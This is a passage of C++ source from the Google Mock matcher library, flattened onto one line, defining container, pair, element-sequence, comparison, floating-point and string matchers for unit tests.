Contains(element_matcher) for the given argument type Container. // Symmetric to EachMatcherImpl. template <typename Container> class ContainsMatcherImpl : public QuantifierMatcherImpl<Container> { public: template <typename InnerMatcher> explicit ContainsMatcherImpl(InnerMatcher inner_matcher) : QuantifierMatcherImpl<Container>(inner_matcher) {} // Describes what this matcher does. virtual void DescribeTo(::std::ostream* os) const { *os << "contains at least one element that "; this->inner_matcher_.DescribeTo(os); } virtual void DescribeNegationTo(::std::ostream* os) const { *os << "doesn't contain any element that "; this->inner_matcher_.DescribeTo(os); } virtual bool MatchAndExplain(Container container, MatchResultListener* listener) const { return this->MatchAndExplainImpl(false, container, listener); } private: GTEST_DISALLOW_ASSIGN_(ContainsMatcherImpl); }; // Implements Each(element_matcher) for the given argument type Container. // Symmetric to ContainsMatcherImpl. template <typename Container> class EachMatcherImpl : public QuantifierMatcherImpl<Container> { public: template <typename InnerMatcher> explicit EachMatcherImpl(InnerMatcher inner_matcher) : QuantifierMatcherImpl<Container>(inner_matcher) {} // Describes what this matcher does. virtual void DescribeTo(::std::ostream* os) const { *os << "only contains elements that "; this->inner_matcher_.DescribeTo(os); } virtual void DescribeNegationTo(::std::ostream* os) const { *os << "contains some element that "; this->inner_matcher_.DescribeNegationTo(os); } virtual bool MatchAndExplain(Container container, MatchResultListener* listener) const { return this->MatchAndExplainImpl(true, container, listener); } private: GTEST_DISALLOW_ASSIGN_(EachMatcherImpl); }; // Implements polymorphic Contains(element_matcher). template <typename M> class ContainsMatcher { public: explicit ContainsMatcher(M m) : inner_matcher_(m) {} template <typename Container> operator Matcher<Container>() const { return MakeMatcher(new ContainsMatcherImpl<Container>(inner_matcher_)); } private: const M inner_matcher_; GTEST_DISALLOW_ASSIGN_(ContainsMatcher); }; // Implements polymorphic Each(element_matcher). template <typename M> class EachMatcher { public: explicit EachMatcher(M m) : inner_matcher_(m) {} template <typename Container> operator Matcher<Container>() const { return MakeMatcher(new EachMatcherImpl<Container>(inner_matcher_)); } private: const M inner_matcher_; GTEST_DISALLOW_ASSIGN_(EachMatcher); }; // Implements Key(inner_matcher) for the given argument pair type. // Key(inner_matcher) matches an std::pair whose 'first' field matches // inner_matcher. For example, Contains(Key(Ge(5))) can be used to match an // std::map that contains at least one element whose key is >= 5. template <typename PairType> class KeyMatcherImpl : public MatcherInterface<PairType> { public: typedef GTEST_REMOVE_REFERENCE_AND_CONST_(PairType) RawPairType; typedef typename RawPairType::first_type KeyType; template <typename InnerMatcher> explicit KeyMatcherImpl(InnerMatcher inner_matcher) : inner_matcher_( testing::SafeMatcherCast<const KeyType&>(inner_matcher)) { } // Returns true iff 'key_value.first' (the key) matches the inner matcher. virtual bool MatchAndExplain(PairType key_value, MatchResultListener* listener) const { StringMatchResultListener inner_listener; const bool match = inner_matcher_.MatchAndExplain(key_value.first, &inner_listener); const internal::string explanation = inner_listener.str(); if (explanation != "") { *listener << "whose first field is a value " << explanation; } return match; } // Describes what this matcher does. virtual void DescribeTo(::std::ostream* os) const { *os << "has a key that "; inner_matcher_.DescribeTo(os); } // Describes what the negation of this matcher does. virtual void DescribeNegationTo(::std::ostream* os) const { *os << "doesn't have a key that "; inner_matcher_.DescribeTo(os); } private: const Matcher<const KeyType&> inner_matcher_; GTEST_DISALLOW_ASSIGN_(KeyMatcherImpl); }; // Implements polymorphic Key(matcher_for_key). template <typename M> class KeyMatcher { public: explicit KeyMatcher(M m) : matcher_for_key_(m) {} template <typename PairType> operator Matcher<PairType>() const { return MakeMatcher(new KeyMatcherImpl<PairType>(matcher_for_key_)); } private: const M matcher_for_key_; GTEST_DISALLOW_ASSIGN_(KeyMatcher); }; // Implements Pair(first_matcher, second_matcher) for the given argument pair // type with its two matchers. See Pair() function below. template <typename PairType> class PairMatcherImpl : public MatcherInterface<PairType> { public: typedef GTEST_REMOVE_REFERENCE_AND_CONST_(PairType) RawPairType; typedef typename RawPairType::first_type FirstType; typedef typename RawPairType::second_type SecondType; template <typename FirstMatcher, typename SecondMatcher> PairMatcherImpl(FirstMatcher first_matcher, SecondMatcher second_matcher) : first_matcher_( testing::SafeMatcherCast<const FirstType&>(first_matcher)), second_matcher_( testing::SafeMatcherCast<const SecondType&>(second_matcher)) { } // Describes what this matcher does. virtual void DescribeTo(::std::ostream* os) const { *os << "has a first field that "; first_matcher_.DescribeTo(os); *os << ", and has a second field that "; second_matcher_.DescribeTo(os); } // Describes what the negation of this matcher does. virtual void DescribeNegationTo(::std::ostream* os) const { *os << "has a first field that "; first_matcher_.DescribeNegationTo(os); *os << ", or has a second field that "; second_matcher_.DescribeNegationTo(os); } // Returns true iff 'a_pair.first' matches first_matcher and 'a_pair.second' // matches second_matcher. virtual bool MatchAndExplain(PairType a_pair, MatchResultListener* listener) const { if (!listener->IsInterested()) { // If the listener is not interested, we don't need to construct the // explanation. return first_matcher_.Matches(a_pair.first) && second_matcher_.Matches(a_pair.second); } StringMatchResultListener first_inner_listener; if (!first_matcher_.MatchAndExplain(a_pair.first, &first_inner_listener)) { *listener << "whose first field does not match"; PrintIfNotEmpty(first_inner_listener.str(), listener->stream()); return false; } StringMatchResultListener second_inner_listener; if (!second_matcher_.MatchAndExplain(a_pair.second, &second_inner_listener)) { *listener << "whose second field does not match"; PrintIfNotEmpty(second_inner_listener.str(), listener->stream()); return false; } ExplainSuccess(first_inner_listener.str(), second_inner_listener.str(), listener); return true; } private: void ExplainSuccess(const internal::string& first_explanation, const internal::string& second_explanation, MatchResultListener* listener) const { *listener << "whose both fields match"; if (first_explanation != "") { *listener << ", where the first field is a value " << first_explanation; } if (second_explanation != "") { *listener << ", "; if (first_explanation != "") { *listener << "and "; } else { *listener << "where "; } *listener << "the second field is a value " << second_explanation; } } const Matcher<const FirstType&> first_matcher_; const Matcher<const SecondType&> second_matcher_; GTEST_DISALLOW_ASSIGN_(PairMatcherImpl); }; // Implements polymorphic Pair(first_matcher, second_matcher). template <typename FirstMatcher, typename SecondMatcher> class PairMatcher { public: PairMatcher(FirstMatcher first_matcher, SecondMatcher second_matcher) : first_matcher_(first_matcher), second_matcher_(second_matcher) {} template <typename PairType> operator Matcher<PairType> () const { return MakeMatcher( new PairMatcherImpl<PairType>( first_matcher_, second_matcher_)); } private: const FirstMatcher first_matcher_; const SecondMatcher second_matcher_; GTEST_DISALLOW_ASSIGN_(PairMatcher); }; // Implements ElementsAre() and ElementsAreArray(). template <typename Container> class ElementsAreMatcherImpl : public MatcherInterface<Container> { public: typedef GTEST_REMOVE_REFERENCE_AND_CONST_(Container) RawContainer; typedef internal::StlContainerView<RawContainer> View; typedef typename View::type StlContainer; typedef typename View::const_reference StlContainerReference; typedef typename StlContainer::value_type Element; // Constructs the matcher from a sequence of element values or // element matchers. template <typename InputIter> ElementsAreMatcherImpl(InputIter first, InputIter last) { while (first != last) { matchers_.push_back(MatcherCast<const Element&>(*first++)); } } // Describes what this matcher does. virtual void DescribeTo(::std::ostream* os) const { if (count() == 0) { *os << "is empty"; } else if (count() == 1) { *os << "has 1 element that "; matchers_[0].DescribeTo(os); } else { *os << "has " << Elements(count()) << " where\n"; for (size_t i = 0; i != count(); ++i) { *os << "element #" << i << " "; matchers_[i].DescribeTo(os); if (i + 1 < count()) { *os << ",\n"; } } } } // Describes what the negation of this matcher does. virtual void DescribeNegationTo(::std::ostream* os) const { if (count() == 0) { *os << "isn't empty"; return; } *os << "doesn't have " << Elements(count()) << ", or\n"; for (size_t i = 0; i != count(); ++i) { *os << "element #" << i << " "; matchers_[i].DescribeNegationTo(os); if (i + 1 < count()) { *os << ", or\n"; } } } virtual bool MatchAndExplain(Container container, MatchResultListener* listener) const { // To work with stream-like "containers", we must only walk // through the elements in one pass. const bool listener_interested = listener->IsInterested(); // explanations[i] is the explanation of the element at index i. ::std::vector<internal::string> explanations(count()); StlContainerReference stl_container = View::ConstReference(container); typename StlContainer::const_iterator it = stl_container.begin(); size_t exam_pos = 0; bool mismatch_found = false; // Have we found a mismatched element yet? // Go through the elements and matchers in pairs, until we reach // the end of either the elements or the matchers, or until we find a // mismatch. for (; it != stl_container.end() && exam_pos != count(); ++it, ++exam_pos) { bool match; // Does the current element match the current matcher? if (listener_interested) { StringMatchResultListener s; match = matchers_[exam_pos].MatchAndExplain(*it, &s); explanations[exam_pos] = s.str(); } else { match = matchers_[exam_pos].Matches(*it); } if (!match) { mismatch_found = true; break; } } // If mismatch_found is true, 'exam_pos' is the index of the mismatch. // Find how many elements the actual container has. We avoid // calling size() s.t. this code works for stream-like "containers" // that don't define size(). size_t actual_count = exam_pos; for (; it != stl_container.end(); ++it) { ++actual_count; } if (actual_count != count()) { // The element count doesn't match. If the container is empty, // there's no need to explain anything as Google Mock already // prints the empty container. Otherwise we just need to show // how many elements there actually are. if (listener_interested && (actual_count != 0)) { *listener << "which has " << Elements(actual_count); } return false; } if (mismatch_found) { // The element count matches, but the exam_pos-th element doesn't match. if (listener_interested) { *listener << "whose element #" << exam_pos << " doesn't match"; PrintIfNotEmpty(explanations[exam_pos], listener->stream()); } return false; } // Every element matches its expectation. We need to explain why // (the obvious ones can be skipped). if (listener_interested) { bool reason_printed = false; for (size_t i = 0; i != count(); ++i) { const internal::string& s = explanations[i]; if (!s.empty()) { if (reason_printed) { *listener << ",\nand "; } *listener << "whose element #" << i << " matches, " << s; reason_printed = true; } } } return true; } private: static Message Elements(size_t count) { return Message() << count << (count == 1 ? " element" : " elements"); } size_t count() const { return matchers_.size(); } ::std::vector<Matcher<const Element&> > matchers_; GTEST_DISALLOW_ASSIGN_(ElementsAreMatcherImpl); }; // Connectivity matrix of (elements X matchers), in element-major order. // Initially, there are no edges. // Use NextGraph() to iterate over all possible edge configurations. // Use Randomize() to generate a random edge configuration. class GTEST_API_ MatchMatrix { public: MatchMatrix(size_t num_elements, size_t num_matchers) : num_elements_(num_elements), num_matchers_(num_matchers), matched_(num_elements_* num_matchers_, 0) { } size_t LhsSize() const { return num_elements_; } size_t RhsSize() const { return num_matchers_; } bool HasEdge(size_t ilhs, size_t irhs) const { return matched_[SpaceIndex(ilhs, irhs)] == 1; } void SetEdge(size_t ilhs, size_t irhs, bool b) { matched_[SpaceIndex(ilhs, irhs)] = b ? 1 : 0; } // Treating the connectivity matrix as a (LhsSize()*RhsSize())-bit number, // adds 1 to that number; returns false if incrementing the graph left it // empty. bool NextGraph(); void Randomize(); string DebugString() const; private: size_t SpaceIndex(size_t ilhs, size_t irhs) const { return ilhs * num_matchers_ + irhs; } size_t num_elements_; size_t num_matchers_; // Each element is a char interpreted as bool. They are stored as a // flattened array in lhs-major order, use 'SpaceIndex()' to translate // a (ilhs, irhs) matrix coordinate into an offset. ::std::vector<char> matched_; }; typedef ::std::pair<size_t, size_t> ElementMatcherPair; typedef ::std::vector<ElementMatcherPair> ElementMatcherPairs; // Returns a maximum bipartite matching for the specified graph 'g'. // The matching is represented as a vector of {element, matcher} pairs. GTEST_API_ ElementMatcherPairs FindMaxBipartiteMatching(const MatchMatrix& g); GTEST_API_ bool FindPairing(const MatchMatrix& matrix, MatchResultListener* listener); // Untyped base class for implementing UnorderedElementsAre. By // putting logic that's not specific to the element type here, we // reduce binary bloat and increase compilation speed. class GTEST_API_ UnorderedElementsAreMatcherImplBase { protected: // A vector of matcher describers, one for each element matcher. // Does not own the describers (and thus can be used only when the // element matchers are alive). typedef ::std::vector<const MatcherDescriberInterface*> MatcherDescriberVec; // Describes this UnorderedElementsAre matcher. void DescribeToImpl(::std::ostream* os) const; // Describes the negation of this UnorderedElementsAre matcher. void DescribeNegationToImpl(::std::ostream* os) const; bool VerifyAllElementsAndMatchersAreMatched( const ::std::vector<string>& element_printouts, const MatchMatrix& matrix, MatchResultListener* listener) const; MatcherDescriberVec& matcher_describers() { return matcher_describers_; } static Message Elements(size_t n) { return Message() << n << " element" << (n == 1 ? "" : "s"); } private: MatcherDescriberVec matcher_describers_; GTEST_DISALLOW_ASSIGN_(UnorderedElementsAreMatcherImplBase); }; // Implements unordered ElementsAre and unordered ElementsAreArray. template <typename Container> class UnorderedElementsAreMatcherImpl : public MatcherInterface<Container>, public UnorderedElementsAreMatcherImplBase { public: typedef GTEST_REMOVE_REFERENCE_AND_CONST_(Container) RawContainer; typedef internal::StlContainerView<RawContainer> View; typedef typename View::type StlContainer; typedef typename View::const_reference StlContainerReference; typedef typename StlContainer::const_iterator StlContainerConstIterator; typedef typename StlContainer::value_type Element; // Constructs the matcher from a sequence of element values or // element matchers. template <typename InputIter> UnorderedElementsAreMatcherImpl(InputIter first, InputIter last) { for (; first != last; ++first) { matchers_.push_back(MatcherCast<const Element&>(*first)); matcher_describers().push_back(matchers_.back().GetDescriber()); } } // Describes what this matcher does. virtual void DescribeTo(::std::ostream* os) const { return UnorderedElementsAreMatcherImplBase::DescribeToImpl(os); } // Describes what the negation of this matcher does. virtual void DescribeNegationTo(::std::ostream* os) const { return UnorderedElementsAreMatcherImplBase::DescribeNegationToImpl(os); } virtual bool MatchAndExplain(Container container, MatchResultListener* listener) const { StlContainerReference stl_container = View::ConstReference(container); ::std::vector<string> element_printouts; MatchMatrix matrix = AnalyzeElements(stl_container.begin(), stl_container.end(), &element_printouts, listener); const size_t actual_count = matrix.LhsSize(); if (actual_count == 0 && matchers_.empty()) { return true; } if (actual_count != matchers_.size()) { // The element count doesn't match. If the container is empty, // there's no need to explain anything as Google Mock already // prints the empty container. Otherwise we just need to show // how many elements there actually are. if (actual_count != 0 && listener->IsInterested()) { *listener << "which has " << Elements(actual_count); } return false; } return VerifyAllElementsAndMatchersAreMatched(element_printouts, matrix, listener) && FindPairing(matrix, listener); } private: typedef ::std::vector<Matcher<const Element&> > MatcherVec; template <typename ElementIter> MatchMatrix AnalyzeElements(ElementIter elem_first, ElementIter elem_last, ::std::vector<string>* element_printouts, MatchResultListener* listener) const { element_printouts->clear(); ::std::vector<char> did_match; size_t num_elements = 0; for (; elem_first != elem_last; ++num_elements, ++elem_first) { if (listener->IsInterested()) { element_printouts->push_back(PrintToString(*elem_first)); } for (size_t irhs = 0; irhs != matchers_.size(); ++irhs) { did_match.push_back(Matches(matchers_[irhs])(*elem_first)); } } MatchMatrix matrix(num_elements, matchers_.size()); ::std::vector<char>::const_iterator did_match_iter = did_match.begin(); for (size_t ilhs = 0; ilhs != num_elements; ++ilhs) { for (size_t irhs = 0; irhs != matchers_.size(); ++irhs) { matrix.SetEdge(ilhs, irhs, *did_match_iter++ != 0); } } return matrix; } MatcherVec matchers_; GTEST_DISALLOW_ASSIGN_(UnorderedElementsAreMatcherImpl); }; // Functor for use in TransformTuple. // Performs MatcherCast<Target> on an input argument of any type. template <typename Target> struct CastAndAppendTransform { template <typename Arg> Matcher<Target> operator()(const Arg& a) const { return MatcherCast<Target>(a); } }; // Implements UnorderedElementsAre. template <typename MatcherTuple> class UnorderedElementsAreMatcher { public: explicit UnorderedElementsAreMatcher(const MatcherTuple& args) : matchers_(args) {} template <typename Container> operator Matcher<Container>() const { typedef GTEST_REMOVE_REFERENCE_AND_CONST_(Container) RawContainer; typedef typename internal::StlContainerView<RawContainer>::type View; typedef typename View::value_type Element; typedef ::std::vector<Matcher<const Element&> > MatcherVec; MatcherVec matchers; matchers.reserve(::testing::tuple_size<MatcherTuple>::value); TransformTupleValues(CastAndAppendTransform<const Element&>(), matchers_, ::std::back_inserter(matchers)); return MakeMatcher(new UnorderedElementsAreMatcherImpl<Container>( matchers.begin(), matchers.end())); } private: const MatcherTuple matchers_; GTEST_DISALLOW_ASSIGN_(UnorderedElementsAreMatcher); }; // Implements ElementsAre. template <typename MatcherTuple> class ElementsAreMatcher { public: explicit ElementsAreMatcher(const MatcherTuple& args) : matchers_(args) {} template <typename Container> operator Matcher<Container>() const { typedef GTEST_REMOVE_REFERENCE_AND_CONST_(Container) RawContainer; typedef typename internal::StlContainerView<RawContainer>::type View; typedef typename View::value_type Element; typedef ::std::vector<Matcher<const Element&> > MatcherVec; MatcherVec matchers; matchers.reserve(::testing::tuple_size<MatcherTuple>::value); TransformTupleValues(CastAndAppendTransform<const Element&>(), matchers_, ::std::back_inserter(matchers)); return MakeMatcher(new ElementsAreMatcherImpl<Container>( matchers.begin(), matchers.end())); } private: const MatcherTuple matchers_; GTEST_DISALLOW_ASSIGN_(ElementsAreMatcher); }; // Implements UnorderedElementsAreArray(). template <typename T> class UnorderedElementsAreArrayMatcher { public: UnorderedElementsAreArrayMatcher() {} template <typename Iter> UnorderedElementsAreArrayMatcher(Iter first, Iter last) : matchers_(first, last) {} template <typename Container> operator Matcher<Container>() const { return MakeMatcher( new UnorderedElementsAreMatcherImpl<Container>(matchers_.begin(), matchers_.end())); } private: ::std::vector<T> matchers_; GTEST_DISALLOW_ASSIGN_(UnorderedElementsAreArrayMatcher); }; // Implements ElementsAreArray(). template <typename T> class ElementsAreArrayMatcher { public: template <typename Iter> ElementsAreArrayMatcher(Iter first, Iter last) : matchers_(first, last) {} template <typename Container> operator Matcher<Container>() const { return MakeMatcher(new ElementsAreMatcherImpl<Container>( matchers_.begin(), matchers_.end())); } private: const ::std::vector<T> matchers_; GTEST_DISALLOW_ASSIGN_(ElementsAreArrayMatcher); }; // Returns the description for a matcher defined using the MATCHER*() // macro where the user-supplied description string is "", if // 'negation' is false; otherwise returns the description of the // negation of the matcher. 'param_values' contains a list of strings // that are the print-out of the matcher's parameters. GTEST_API_ string FormatMatcherDescription(bool negation, const char* matcher_name, const Strings& param_values); } // namespace internal // ElementsAreArray(first, last) // ElementsAreArray(pointer, count) // ElementsAreArray(array) // ElementsAreArray(vector) // ElementsAreArray({ e1, e2, ..., en }) // // The ElementsAreArray() functions are like ElementsAre(...), except // that they are given a homogeneous sequence rather than taking each // element as a function argument. The sequence can be specified as an // array, a pointer and count, a vector, an initializer list, or an // STL iterator range. In each of these cases, the underlying sequence // can be either a sequence of values or a sequence of matchers. // // All forms of ElementsAreArray() make a copy of the input matcher sequence. template <typename Iter> inline internal::ElementsAreArrayMatcher< typename ::std::iterator_traits<Iter>::value_type> ElementsAreArray(Iter first, Iter last) { typedef typename ::std::iterator_traits<Iter>::value_type T; return internal::ElementsAreArrayMatcher<T>(first, last); } template <typename T> inline internal::ElementsAreArrayMatcher<T> ElementsAreArray( const T* pointer, size_t count) { return ElementsAreArray(pointer, pointer + count); } template <typename T, size_t N> inline internal::ElementsAreArrayMatcher<T> ElementsAreArray( const T (&array)[N]) { return ElementsAreArray(array, N); } template <typename T, typename A> inline internal::ElementsAreArrayMatcher<T> ElementsAreArray( const ::std::vector<T, A>& vec) { return ElementsAreArray(vec.begin(), vec.end()); } #if GTEST_HAS_STD_INITIALIZER_LIST_ template <typename T> inline internal::ElementsAreArrayMatcher<T> ElementsAreArray(::std::initializer_list<T> xs) { return ElementsAreArray(xs.begin(), xs.end()); } #endif // UnorderedElementsAreArray(first, last) // UnorderedElementsAreArray(pointer, count) // UnorderedElementsAreArray(array) // UnorderedElementsAreArray(vector) // UnorderedElementsAreArray({ e1, e2, ..., en }) // // The UnorderedElementsAreArray() functions are like // ElementsAreArray(...), but allow matching the elements in any order. template <typename Iter> inline internal::UnorderedElementsAreArrayMatcher< typename ::std::iterator_traits<Iter>::value_type> UnorderedElementsAreArray(Iter first, Iter last) { typedef typename ::std::iterator_traits<Iter>::value_type T; return internal::UnorderedElementsAreArrayMatcher<T>(first, last); } template <typename T> inline internal::UnorderedElementsAreArrayMatcher<T> UnorderedElementsAreArray(const T* pointer, size_t count) { return UnorderedElementsAreArray(pointer, pointer + count); } template <typename T, size_t N> inline internal::UnorderedElementsAreArrayMatcher<T> UnorderedElementsAreArray(const T (&array)[N]) { return UnorderedElementsAreArray(array, N); } template <typename T, typename A> inline internal::UnorderedElementsAreArrayMatcher<T> UnorderedElementsAreArray(const ::std::vector<T, A>& vec) { return UnorderedElementsAreArray(vec.begin(), vec.end()); } #if GTEST_HAS_STD_INITIALIZER_LIST_ template <typename T> inline internal::UnorderedElementsAreArrayMatcher<T> UnorderedElementsAreArray(::std::initializer_list<T> xs) { return UnorderedElementsAreArray(xs.begin(), xs.end()); } #endif // _ is a matcher that matches anything of any type. // // This definition is fine as: // // 1. The C++ standard permits using the name _ in a namespace that // is not the global namespace or ::std. // 2. The AnythingMatcher class has no data member or constructor, // so it's OK to create global variables of this type. // 3. c-style has approved of using _ in this case. const internal::AnythingMatcher _ = {}; // Creates a matcher that matches any value of the given type T. template <typename T> inline Matcher<T> A() { return MakeMatcher(new internal::AnyMatcherImpl<T>()); } // Creates a matcher that matches any value of the given type T. template <typename T> inline Matcher<T> An() { return A<T>(); } // Creates a polymorphic matcher that matches anything equal to x. // Note: if the parameter of Eq() were declared as const T&, Eq("foo") // wouldn't compile. template <typename T> inline internal::EqMatcher<T> Eq(T x) { return internal::EqMatcher<T>(x); } // Constructs a Matcher<T> from a 'value' of type T. The constructed // matcher matches any value that's equal to 'value'. template <typename T> Matcher<T>::Matcher(T value) { *this = Eq(value); } // Creates a monomorphic matcher that matches anything with type Lhs // and equal to rhs. A user may need to use this instead of Eq(...) // in order to resolve an overloading ambiguity. // // TypedEq<T>(x) is just a convenient short-hand for Matcher<T>(Eq(x)) // or Matcher<T>(x), but more readable than the latter. // // We could define similar monomorphic matchers for other comparison // operations (e.g. TypedLt, TypedGe, and etc), but decided not to do // it yet as those are used much less than Eq() in practice. A user // can always write Matcher<T>(Lt(5)) to be explicit about the type, // for example. template <typename Lhs, typename Rhs> inline Matcher<Lhs> TypedEq(const Rhs& rhs) { return Eq(rhs); } // Creates a polymorphic matcher that matches anything >= x. template <typename Rhs> inline internal::GeMatcher<Rhs> Ge(Rhs x) { return internal::GeMatcher<Rhs>(x); } // Creates a polymorphic matcher that matches anything > x. template <typename Rhs> inline internal::GtMatcher<Rhs> Gt(Rhs x) { return internal::GtMatcher<Rhs>(x); } // Creates a polymorphic matcher that matches anything <= x. template <typename Rhs> inline internal::LeMatcher<Rhs> Le(Rhs x) { return internal::LeMatcher<Rhs>(x); } // Creates a polymorphic matcher that matches anything < x. template <typename Rhs> inline internal::LtMatcher<Rhs> Lt(Rhs x) { return internal::LtMatcher<Rhs>(x); } // Creates a polymorphic matcher that matches anything != x. template <typename Rhs> inline internal::NeMatcher<Rhs> Ne(Rhs x) { return internal::NeMatcher<Rhs>(x); } // Creates a polymorphic matcher that matches any NULL pointer. inline PolymorphicMatcher<internal::IsNullMatcher > IsNull() { return MakePolymorphicMatcher(internal::IsNullMatcher()); } // Creates a polymorphic matcher that matches any non-NULL pointer. // This is convenient as Not(NULL) doesn't compile (the compiler // thinks that that expression is comparing a pointer with an integer). inline PolymorphicMatcher<internal::NotNullMatcher > NotNull() { return MakePolymorphicMatcher(internal::NotNullMatcher()); } // Creates a polymorphic matcher that matches any argument that // references variable x. template <typename T> inline internal::RefMatcher<T&> Ref(T& x) { // NOLINT return internal::RefMatcher<T&>(x); } // Creates a matcher that matches any double argument approximately // equal to rhs, where two NANs are considered unequal. inline internal::FloatingEqMatcher<double> DoubleEq(double rhs) { return internal::FloatingEqMatcher<double>(rhs, false); } // Creates a matcher that matches any double argument approximately // equal to rhs, including NaN values when rhs is NaN. inline internal::FloatingEqMatcher<double> NanSensitiveDoubleEq(double rhs) { return internal::FloatingEqMatcher<double>(rhs, true); } // Creates a matcher that matches any double argument approximately equal to // rhs, up to the specified max absolute error bound, where two NANs are // considered unequal. The max absolute error bound must be non-negative. inline internal::FloatingEqMatcher<double> DoubleNear( double rhs, double max_abs_error) { return internal::FloatingEqMatcher<double>(rhs, false, max_abs_error); } // Creates a matcher that matches any double argument approximately equal to // rhs, up to the specified max absolute error bound, including NaN values when // rhs is NaN. The max absolute error bound must be non-negative. inline internal::FloatingEqMatcher<double> NanSensitiveDoubleNear( double rhs, double max_abs_error) { return internal::FloatingEqMatcher<double>(rhs, true, max_abs_error); } // Creates a matcher that matches any float argument approximately // equal to rhs, where two NANs are considered unequal. inline internal::FloatingEqMatcher<float> FloatEq(float rhs) { return internal::FloatingEqMatcher<float>(rhs, false); } // Creates a matcher that matches any float argument approximately // equal to rhs, including NaN values when rhs is NaN. inline internal::FloatingEqMatcher<float> NanSensitiveFloatEq(float rhs) { return internal::FloatingEqMatcher<float>(rhs, true); } // Creates a matcher that matches any float argument approximately equal to // rhs, up to the specified max absolute error bound, where two NANs are // considered unequal. The max absolute error bound must be non-negative. inline internal::FloatingEqMatcher<float> FloatNear( float rhs, float max_abs_error) { return internal::FloatingEqMatcher<float>(rhs, false, max_abs_error); } // Creates a matcher that matches any float argument approximately equal to // rhs, up to the specified max absolute error bound, including NaN values when // rhs is NaN. The max absolute error bound must be non-negative. inline internal::FloatingEqMatcher<float> NanSensitiveFloatNear( float rhs, float max_abs_error) { return internal::FloatingEqMatcher<float>(rhs, true, max_abs_error); } // Creates a matcher that matches a pointer (raw or smart) that points // to a value that matches inner_matcher. template <typename InnerMatcher> inline internal::PointeeMatcher<InnerMatcher> Pointee( const InnerMatcher& inner_matcher) { return internal::PointeeMatcher<InnerMatcher>(inner_matcher); } // Creates a matcher that matches an object whose given field matches // 'matcher'. For example, // Field(&Foo::number, Ge(5)) // matches a Foo object x iff x.number >= 5. template <typename Class, typename FieldType, typename FieldMatcher> inline PolymorphicMatcher< internal::FieldMatcher<Class, FieldType> > Field( FieldType Class::*field, const FieldMatcher& matcher) { return MakePolymorphicMatcher( internal::FieldMatcher<Class, FieldType>( field, MatcherCast<const FieldType&>(matcher))); // The call to MatcherCast() is required for supporting inner // matchers of compatible types. For example, it allows // Field(&Foo::bar, m) // to compile where bar is an int32 and m is a matcher for int64. } // Creates a matcher that matches an object whose given property // matches 'matcher'. For example, // Property(&Foo::str, StartsWith("hi")) // matches a Foo object x iff x.str() starts with "hi". template <typename Class, typename PropertyType, typename PropertyMatcher> inline PolymorphicMatcher< internal::PropertyMatcher<Class, PropertyType> > Property( PropertyType (Class::*property)() const, const PropertyMatcher& matcher) { return MakePolymorphicMatcher( internal::PropertyMatcher<Class, PropertyType>( property, MatcherCast<GTEST_REFERENCE_TO_CONST_(PropertyType)>(matcher))); // The call to MatcherCast() is required for supporting inner // matchers of compatible types. For example, it allows // Property(&Foo::bar, m) // to compile where bar() returns an int32 and m is a matcher for int64. } // Creates a matcher that matches an object iff the result of applying // a callable to x matches 'matcher'. // For example, // ResultOf(f, StartsWith("hi")) // matches a Foo object x iff f(x) starts with "hi". // callable parameter can be a function, function pointer, or a functor. // Callable has to satisfy the following conditions: // * It is required to keep no state affecting the results of // the calls on it and make no assumptions about how many calls // will be made. Any state it keeps must be protected from the // concurrent access. // * If it is a function object, it has to define type result_type. // We recommend deriving your functor classes from std::unary_function. template <typename Callable, typename ResultOfMatcher> internal::ResultOfMatcher<Callable> ResultOf( Callable callable, const ResultOfMatcher& matcher) { return internal::ResultOfMatcher<Callable>( callable, MatcherCast<typename internal::CallableTraits<Callable>::ResultType>( matcher)); // The call to MatcherCast() is required for supporting inner // matchers of compatible types. For example, it allows // ResultOf(Function, m) // to compile where Function() returns an int32 and m is a matcher for int64. } // String matchers. // Matches a string equal to str. inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::string> > StrEq(const internal::string& str) { return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::string>( str, true, true)); } // Matches a string not equal to str. inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::string> > StrNe(const internal::string& str) { return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::string>( str, false, true)); } // Matches a string equal to str, ignoring case. inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::string> > StrCaseEq(const internal::string& str) { return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::string>( str, true, false)); } // Matches a string not equal to str, ignoring case. inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::string> > StrCaseNe(const internal::string& str) { return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::string>( str, false, false)); } // Creates a matcher that matches any string, std::string, or C string // that contains the given substring. inline PolymorphicMatcher<internal::HasSubstrMatcher<internal::string> > HasSubstr(const internal::string& substring) { return MakePolymorphicMatcher(internal::HasSubstrMatcher<internal::string>( substring)); } // Matches a string that starts with 'prefix' (case-sensitive). inline PolymorphicMatcher<internal::StartsWithMatcher<internal::string> > StartsWith(const internal::string& prefix) { return MakePolymorphicMatcher(internal::StartsWithMatcher<internal::string>( prefix)); } // Matches a string that ends with 'suffix' (case-sensitive). inline PolymorphicMatcher<internal::EndsWithMatcher<internal::string> > EndsWith(const internal::string& suffix) { return MakePolymorphicMatcher(internal::EndsWithMatcher<internal::string>( suffix)); } // Matches a string that fully matches regular expression 'regex'. // The matcher takes ownership of 'regex'. inline PolymorphicMatcher<internal::MatchesRegexMatcher> MatchesRegex( const internal::RE* regex) { return MakePolymorphicMatcher(internal::MatchesRegexMatcher(regex, true)); } inline PolymorphicMatcher<internal::MatchesRegexMatcher> MatchesRegex( const internal::string& regex) { return MatchesRegex(new internal::RE(regex)); } // Matches a string that contains regular expression 'regex'. // The matcher takes ownership of 'regex'. inline PolymorphicMatcher<internal::MatchesRegexMatcher> ContainsRegex( const internal::RE* regex) { return MakePolymorphicMatcher(internal::MatchesRegexMatcher(regex, false)); } inline PolymorphicMatcher<internal::MatchesRegexMatcher> ContainsRegex( const internal::string& regex) { return ContainsRegex(new internal::RE(regex)); } #if GTEST_HAS_GLOBAL_WSTRING || GTEST_HAS_STD_WSTRING // Wide string matchers. // Matches a string equal to str. inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::wstring> > StrEq(const internal::wstring& str) { return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::wstring>( str, true, true)); } // Matches a string not equal to str. inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::wstring> > StrNe(const internal::wstring& str) { return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::wstring>( str, false, true)); } // Matches a string equal to 